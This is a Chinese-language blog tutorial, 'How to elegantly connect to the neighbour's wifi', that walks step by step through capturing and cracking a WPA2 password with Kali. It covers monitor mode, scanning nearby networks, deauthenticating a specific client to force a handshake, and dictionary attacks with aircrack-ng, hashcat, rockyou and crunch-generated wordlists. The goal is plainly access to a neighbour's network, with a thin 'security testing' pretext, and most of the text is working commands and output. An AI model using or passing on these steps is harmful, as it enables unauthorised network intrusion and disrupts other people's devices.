如何优雅连接隔壁家wifi

706 阅读4分钟

基于技术研究今天试试用kali做渗透测试,帮助隔壁家的做安全测试,提前帮他发现漏洞。

原理

  1. 通过工具扫描附近所有wifi的 BSSID 和 CH
  2. 选择一个wifi
  3. 使用工具实时监听当前wifi与下面所有设备
  4. 通过wifi的 BSSID 和 设备mac地址,使其设备断网
  5. 一般设备断网后都会重连
  6. 这时步骤3就能抓到捂手包,包含加密后的密码
  7. 停止步骤3后会生成cap抓包文件
  8. 通过kali自带的字典库与 cap抓包文件对比,直到密码匹配为止。(有可能字典不包含匹配的密码,导致匹配失败)

准备工具

软件

硬件

  • usb无线网卡(RT3070L),(pdd 搜索 kali无线网卡即可,注意要买支持接收和发送,免驱动的)

预备动作

  1. 解压kali镜像
  2. vmware加载镜像
  3. 插入usb无线网卡
  4. 在连接设备勾选usb设备

实战

1. 启动

# 进入root模式 默认账号+密码 kali 
sudo -i
# 查看当前设备
ifconfig # 一般显示wlan0: 
# 开始监听模式
airmon-ng start wlan0
# 再次查看当前设备
ifconfig # 一般显示wlan0mon: 证明成功

2. 搜索所有wifi信息

# 开始监听
airodump-ng wlan0mon 

# 显示如下                                                                    
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                        
 28:23:F5:74:DC:00  -71        4        0    0   6  130   WPA2 CCMP   PSK  CMCC-6xZa                                                                        
 FC:7A:58:07:D5:85  -85        2        1    0   6  360   WPA2 CCMP   PSK  6-30C                                                                            
 84:76:37:09:73:B4  -80        5        0    0   6  270   WPA2 CCMP   PSK  Huang08                                                                          
 F0:B4:29:FE:E8:03  -83        4        0    0  11  130   WPA2 CCMP   PSK  20E          
   
# 记住想要连接的 BSSID 和 CH ,
#如:
#CMCC-6xZa 
#BSSID: 28:23:F5:74:DC:00   
#CH: 6  

3. 开始监听 指定wifi

开始针对CMCC-6xZa 实时抓包 # -c 后面是CH , -w后面是保存的地址 , wlan0mon就是进入监听后的网卡名

# 监听命令
airodump-ng -c 6 --bssid 28:23:F5:74:DC:00   -w /home/kali/Desktop/bb  wlan0mon
# 此时会进入不断的扫描连接的报文,并且保存的本地,当获取的报文会有右上角会有提示‘’,并且生成关键文件

# 输出下面内容
 CH  2 ][ Elapsed: 24 s ][ 2023-08-04 12:39 ][ WPA handshake: 0C:D8:6C:85:2C 
                                                                             
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AU 
                                                                             
 0C:D8:6C:85:2C:3E  -60   2      187       20    2   2  270   WPA2 CCMP   PS 
                                                                             
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes   
                                                                           
 0C:D8:6C:85:2C:3E  EC:5C:68:71:A2:89  -60    0 - 1      0        1          
 0C:D8:6C:85:2C:3E  CE:79:05:6E:18:A9  -80    0 -24      0       57          
 0C:D8:6C:85:2C:3E  D6:D4:9E:72:DB:F0  -76    1e-24      0        3          
 0C:D8:6C:85:2C:3E  B2:59:47:02:C9:4C  -84    1e- 2e   428     3891  EAPOL  c


4. 开始让指定wifi的指定设备断连

# 另外启动一个命令行工具
# 输入以下命令使其设备在该网络下的具体某个终端断连,由于设备断连后会自动重新连接,所以可以让上面的监听获取到报文,  10是发起的次数, -a 是BSSID , -c 后面是具体某个终端的mac地址,
aireplay-ng -0 10 -a  28:23:F5:74:DC:00     -c  B2:59:47:02:C9:4C  wlan0mon

5. 破解,匹配报文

  1. aircrack-ng破解,效率低
# aircrack-ng破解
aircrack-ng -a2 -b  28:23:F5:74:DC:00  -w /usr/share/wordlists/rockyou.txt   /home/kali/Desktop/bb-01.cap

# -b  指定BSSID
# /usr/share/wordlists/rockyou.txt 为提前生成好的字典
# /home/kali/Desktop/bb-02.cap 为步骤3生成的抓包文件
  1. Hashcat,效率高
# 先把cap转化成hccap
aircrack-ng <out.cap> -J <out.hccap>
aircrack-ng bb-02.cap -J bb-02.hccap

# kali自带hashcat,没有可以自己安装
# 安装hashcat
git clone https://github.com/hashcat/hashcat.git 
# 进入目录sudo make 
cd hashcat
#安装hashcat 
sudo make install 

# hashcat开始破解
hashcat -m 22000 bb-02.hccap /usr/share/wordlists/rockyou.txt

5.1 获取字典

# 获取字典方法1 kali自带
wordlists
# 会提示是否是否解压 输入Y
Do you want to extract the wordlist rockyou.txt? [Y/n] y

# 会生成关键文件 rockyou.txt
/usr/share/wordlists/rockyou.txt  

# 获取字典方法2 通过网络下载或同步共享文件夹
https://github.com/conwnet/wpa-dictionary
https://drive.google.com/u/0/uc?id=1L1mDFRJAcShwU1gBAbECkx7OR_C7Ef90&export=download

# 获取字典方法3 共享文件夹
# 1.安装驱动
 apt-get install open-vm-tools-desktop fuse
# 2.在vmware 打开共享开关,并且设置共享文件夹为share
# 3.在kali 创建共享路径
 mkdir  -p   /mnt/hgfs/share
# 4. 挂载
/usr/bin/vmhgfs-fuse .host:/share  /mnt/hgfs/share  -o subtype=vmhgfs-fuse,allow_other
# 5.把要操作东西都往share放

5.2自己生成字典

# 生成8位数字密码
crunch 8 8  0123456789 -o dic.txt